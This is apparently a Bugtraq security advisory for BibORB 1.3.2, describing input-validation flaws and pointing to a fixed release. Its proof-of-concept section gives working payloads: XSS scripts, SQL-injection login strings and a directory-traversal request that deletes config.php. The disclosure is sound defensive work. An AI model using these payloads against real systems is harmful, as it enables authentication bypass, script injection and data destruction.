BID:12583

BibORB Multiple Input Validation Vulnerabilities

Info

BibORB Multiple Input Validation Vulnerabilities

Bugtraq ID:	12583
Class:	Input Validation Error
CVE:	CVE-2005-0251 CVE-2005-0252 CVE-2005-0253 CVE-2005-0254
Remote:	Yes
Local:	No
Published:	Feb 17 2005 12:00AM
Updated:	Jul 12 2009 10:06AM
Credit:	Discovery of these vulnerabilities is credited to Patrick Hof <[email protected]>.
Vulnerable:	BibORB BibORB 1.3.2

Not Vulnerable:	BibORB BibORB 1.3.3 RC 1

Discussion

BibORB Multiple Input Validation Vulnerabilities

BibORB is reported prone to multiple vulnerabilities arising from insufficient sanitization of user-supplied input. These issues can be exploited by a remote attacker to carry out cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload attacks.

These vulnerabilities are reported to affect BibORB version 1.3.2 and all previous versions.

Exploit / POC

BibORB Multiple Input Validation Vulnerabilities

The following examples are available:
http://www.example.com/biborb/bibindex.php?mode=displaysearch&search=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&sort=ID

or

Add Database -> Description: <script>alert('XSS')</script>

When logging in, use the following username and password:

Username: x' or 1=1 or login='x
Password: x') or 1=1 or password=md5('x

http://www.example.com/to/biborb/index.php?mode=result&database_name=../config.php&action=Delete

Solution / Fix

BibORB Multiple Input Validation Vulnerabilities

Solution:
The vendor has released an update to address these vulnerabilities:

BibORB BibORB 1.3.2

BibORB BibORB 1.3.2 Security Update
http://biborb.glymn.net/doku.php?id=download&DokuWiki=396024aefb12a718 f8336c07de2160e9

References

BibORB Multiple Input Validation Vulnerabilities

References:

BibORB Homepage (BibORB)
Advisory: Multiple Vulnerabilities in BibORB (Patrick Hof )